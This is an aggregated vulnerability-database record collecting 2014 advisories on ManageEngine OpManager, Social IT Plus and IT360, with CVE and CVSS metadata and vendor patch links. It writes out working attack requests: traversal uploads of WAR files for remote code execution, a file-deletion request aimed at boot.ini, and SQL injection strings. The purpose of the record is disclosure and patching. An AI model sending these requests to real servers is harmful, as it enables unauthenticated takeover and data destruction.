Note that this is all for OpManager. No indication\r\nwas given of when Social IT or IT360 will be updated with the security\r\nfixes. However the emergency patches can be applied to all applications.\r\n\r\nAnyway details are below, and I have updated the full text advisory in [3].\r\n\r\nRegards,\r\nPedro\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last\r\nupdated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. 
With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration.\"\r\n\r\n\r\n>> Technical details:\r\n\r\n(#1 and #2 were previously released in September, see [2])\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload (unauthenticated\r\non OpManager and Social IT)\r\nCVE-2014-7866\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4;\r\nIT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection (unauthenticated)\r\nCVE-2014-7868\r\nConstraints: no authentication needed for OpManager and Social IT;\r\nauthenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]\r\n --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager\r\n11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].\r\nThis patch can 
be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360\r\n10.4).\r\nThe fix will be included in OpManager version 11.5 which should be\r\nreleased sometime in late November or December 2014. No indication was\r\ngiven for when fixed versions of IT360 and Social IT Plus will be\r\nreleased.\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n\r\n\r\n[1]\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\nhttp://seclists.org/fulldisclosure/2014/Nov/12\r\nhttp://seclists.org/fulldisclosure/2014/Nov/18\r\n\r\n[2]\r\nhttp://seclists.org/fulldisclosure/2014/Sep/110\r\n\r\n[3]\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\n", "edition": 1, "modified": "2014-12-01T00:00:00", "published": "2014-12-01T00:00:00", "id": "SECURITYVULNS:DOC:31461", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31461", "title": "[The ManageOwnage series, part VIII]: Remote code execution and blind SQLi in OpManager, Social IT and IT360", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. 
For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. 
With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. 
No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31197", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:36", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-12-01T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-9031", "CVE-2014-6038", "CVE-2014-9039", "CVE-2014-9015", "CVE-2014-5257", "CVE-2014-8088", "CVE-2014-8958", "CVE-2014-3629", "CVE-2014-8499", "CVE-2014-9035", "CVE-2014-5269", "CVE-2014-8961", "CVE-2014-9033", "CVE-2014-9036", "CVE-2014-7958", "CVE-2014-8350", "CVE-2014-7866", "CVE-2014-6039", "CVE-2014-8959", "CVE-2014-8498", "CVE-2014-7137", "CVE-2014-8429", "CVE-2014-7868", "CVE-2014-8682", "CVE-2012-4437", "CVE-2014-8960", "CVE-2014-9037", "CVE-2014-7959", "CVE-2014-8683", "CVE-2014-9034", "CVE-2014-8732", "CVE-2014-9032", "CVE-2014-8749", "CVE-2014-8877", "CVE-2014-8337", "CVE-2014-9038", "CVE-2014-9016", "CVE-2014-8600", "CVE-2014-8731", "CVE-2014-8539"], "modified": "2014-12-01T00:00:00", "id": "SECURITYVULNS:VULN:14113", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:14113", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", "CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:45", "description": "", "cvss3": {}, "published": "2014-11-09T00:00:00", "type": "packetstorm", "title": "ManageEngine OpManager / Social IT Plus / IT360 File Upload / SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-09T00:00:00", "id": "PACKETSTORM:129037", "href": "https://packetstormsecurity.com/files/129037/ManageEngine-OpManager-Social-IT-Plus-IT360-File-Upload-SQL-Injection.html", "sourceData": "`Hi, \n \nThis is the 8th 
part of the ManageOwnage series. For previous parts see [1]. \n \nThis time we have a file upload leading to remote code execution and a \nblind SQL injection in ManageEngine OpManager, Social IT Plus and \nIT360. \nManageEngine have released an emergency fix, see details in the \nadvisory below. The proper fixed version will be 11.5, which will come \nout at the end of the year. \n \nI had already released a Metasploit exploit for RCE back in September \n[2], which also had an emergency fix and will only be properly fixed \nin 11.5, so there is no point in updating the exploit. This is just \nanother vector that ManageEngine have plugged while we wait for the \nrelease of 11.5. Note that this is all for OpManager. No indication \nwas given of when Social IT or IT360 will be updated with the security \nfixes. However the emergency patches can be applied to all applications. \n \nAnyway details are below, and I have updated the full text advisory in [3]. \n \nRegards, \nPedro \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last \nupdated: 09/11/2014 \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. 
Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n \n(#1 and #2 were previously released in September, see [2]) \n \n#3 \nVulnerability: Remote code execution via file upload (unauthenticated \non OpManager and Social IT) \nCVE-2014-7866 \nConstraints: no authentication needed for OpManager and Social IT; \nauthenticated in IT360 \n \na) \nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00 \n<... WAR file payload ...> \n \nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; \nIT360 10.3/10.4; Social IT 11.0 \n \nb) \nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00 \n<... WAR file payload ...> \n \nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; \nIT360 10.3/10.4; Social IT 11.0 \n \n \n#4 \nVulnerability: Blind SQL injection (unauthenticated) \nCVE-2014-7868 \nConstraints: no authentication needed for OpManager and Social IT; \nauthenticated in IT360 \n \na) \nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi] \nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+ \nAffected versions: Unknown, at least the current versions (OpManager \n11.3/11.4; IT360 10.3/10.4; Social IT 11.0) \n \nb) \nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] \n--> runs direct query in db! 
\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text) \nAffected versions: Unknown, at least the current versions (OpManager \n11.3/11.4; IT360 10.3/10.4; Social IT 11.0) \n \n \n>> Fix: \nUpgrade to OpManager 11.3 or 11.4, then install patches [B] and [C]. \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 \n10.4). \nThe fix will be included in OpManager version 11.5 which should be \nreleased sometime in late November or December 2014. No indication was \ngiven for when fixed versions of IT360 and Social IT Plus will be \nreleased. \n \n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix \nResolves #3 \n \n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability \nResolves #4 \n \n \n \n[1] \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \nhttp://seclists.org/fulldisclosure/2014/Nov/12 \nhttp://seclists.org/fulldisclosure/2014/Nov/18 \n \n[2] \nhttp://seclists.org/fulldisclosure/2014/Sep/110 \n \n[3] \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129037/meomsitpit360-sqlexecupload.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": 
"2014-09-29T00:00:00", "id": "PACKETSTORM:128474", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. 
With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. 
No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2022-08-08T15:35:38", "description": "", "cvss3": {}, "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2014-6034", "2014-6035", "2014-6036", "2014-7866", "2014-7868", "CVE-2014-6034", "CVE-2014-6035", "CVE-2014-6036", "CVE-2014-7866", "CVE-2014-7868"], "modified": "2014-11-09T00:00:00", "id": "EDB-ID:43896", "href": "https://www.exploit-db.com/exploits/43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, 
service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? 
to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. 
No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n\r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n\r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n\r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n\r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>", "sourceHref": "https://www.exploit-db.com/download/43896", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:00:38", "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. 
(dot dot) in the FILENAME parameter.", "cvss3": {}, "published": "2014-12-04T17:59:00", "type": "cve", "title": "CVE-2014-6035", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6035"], "modified": "2014-12-05T13:33:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.4", "cpe:/a:zohocorp:manageengine_opmanager:11.3"], "id": "CVE-2014-6035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:11.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:51:25", "description": "Multiple directory traversal vulnerabilities in ZOHO ManageEngine OpManager 8 (build 88xx) through 11.4, IT360 10.3 and 10.4, and Social IT Plus 11.0 allow remote attackers or remote authenticated users to write and execute arbitrary files via a .. 
